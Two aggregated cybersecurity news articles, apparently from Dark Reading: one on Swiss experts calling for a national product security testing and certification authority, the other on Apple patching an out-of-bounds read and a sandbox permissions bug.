This week, a group of 14 cybersecurity experts at the Supply Chain Security working group of the Cybersecurity Commission of ICTswitzerland called for that country’s government to work to establish a testing and certification authority for the nation. The group is not alone: In 2016, the Commission on Enhancing National Cybersecurity formed by the Obama Administration called for similar certification of consumer technology and the creation of a “nutrition label” to collect simple cybersecurity metrics. In addition, other testing initiatives—from NetSecOPEN to the Cyber ITL—are aiming to shed more light on a variety of classes of products. 

The Swiss cybersecurity group aims to test products, evaluate source code, and prevent the insertion of malicious code into critical devices and applications, says Stefan Frei, cybersecurity principal at Accenture and head of the supply chain security group at ICTswitzerland.

“Looking at supply-chain security, [cybersecurity is] a huge problem—we deploy anything that is given us without thinking,” he says. “If those devices are already compromised … because we have more cyber-physical applications, the result of attacks on that infrastructure is physical harm.” 

IoT’s Influence

The latest call for cybersecurity certification of products comes as three technology trends are gaining steam. 

First, an increasing number of devices are becoming part of the Internet of Things, embedded with a processor and connected to the Internet, expanding the attackable surface area of businesses and consumer households alike. There will be more than 25 billion connected devices in 2020, according to business intelligence firm Gartner.

Second, because more consumer appliances, such as TVs and refrigerators, and industrial devices such as machine controllers and environmental monitors are becoming “smart,” untested technology is also becoming embedded in many devices with long lifespans or use-cycles. Non-critical personal electronics typically are replaced every few years. Smartphones, for example, have the shortest lifespan, being replaced every three years on average, while desktop computers last five or six years, according to survey data from small-business IT information firm Spiceworks. Household appliances typically last 10 years and cars last 15 to 17 years on average.

Finally, the deployment of such connected technology into devices that can have a physical impact means that cyber-physical attacks are now a reality. An online attacker’s actions can have real-world consequences.

Because there has been little oversight of the technology incorporated into companies’ infrastructure and consumer households, the ICTswitzerland report argues that it is likely that many organizations have already been compromised.

“In the absence of a reliable quality inspection of digital products, we have to assume that compromised components are already in use today,” the group said. “Further compromised components will be added continuously, sometimes in critical functions.”

The group of cybersecurity professionals called for a non-profit testing firm, funded by the companies whose products it tests, to review source code and configurations, to analyze and reverse engineer, and to conduct risk assessments. All testing would be open and the results published. 

The certification authority would work even if it could not test every product, Frei says.

“You don’t need to test everything,” he says. “The police do not need to have radar at every intersection to prevent speeding. You just need periodic checks.”

‘Nutrition Labels’

The idea for creating a testing and certification center is not new. The Obama Administration’s Report on the President’s Commission on Enhancing National Cybersecurity included, among its recommendations, the creation of testing and certification groups that could produce cybersecurity “nutrition labels” to allow consumers to compare technology services and products. 

The current “lack of information leaves most consumers unaware of the risks associated with using technology products and services, how these risks might easily be reduced, or how competing products’ security characteristics compare with each other,” the report stated. “Making matters worse, security considerations increasingly may lead to safety concerns, as many Internet-enabled devices can affect the world physically.”

While a broad certification system for electronic devices has not been created yet, a number of private organizations and businesses have arisen to test the cybersecurity capabilities of certain classes of—mostly security—products. 

AV-Test and AV-Comparatives both test anti-virus products, while groups such as ICSA Labs, UL, and NSS Labs do independent testing of broader classes of products. Because such groups do not always publish their methodologies, various industries have also created their own groups to either inform testing or set industry-approved standards for testing.

The Cellular Telecommunications Industry Association (CTIA), for example, maintains the CTIA’s Cybersecurity Certification Program for wireless devices, and the Anti-Malware Testing Standards Organization (AMTSO) sets industry-approved standards for testing antivirus products.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …

Article source: https://www.darkreading.com/iot/cybersecurity-certification-in-the-spotlight-again-/d/d-id/1335940?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Apple Patches Multiple Vulnerabilities Across Platforms

Updates address two separate issues in Apple’s desktop and mobile operating systems.

On the heels of the upgrade to iOS 13, Apple has released a series of security updates to iOS, macOS, iPadOS, and watchOS. There are two separate updates, each addressing a specific vulnerability on multiple platforms.

The first update, released on Thursday, addresses an out-of-bounds memory read (CVE-2019-8641) that could allow an attacker to execute arbitrary code on the target machine. This update affects a number of operating systems across several Apple platforms. Apple released updates designated macOS Mojave 10.14.6 Supplemental Update 2, Security Update 2019-005 High Sierra, and Security Update 2019-005 Sierra; watchOS 5.3.2; and iOS 12.4.2.

Today, Apple also released iOS 13.1.1 and iPadOS 13.1.1. These updates fix an error in the sandbox that iOS and iPadOS use to limit the permissions and resources available to an app: because of the bug, third-party app extensions could run with the wrong permissions, gaining access to resources they should not have been able to reach.

Article source: https://www.darkreading.com/vulnerabilities---threats/apple-patches-multiple-vulnerabilities-across-platforms/d/d-id/1335941?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple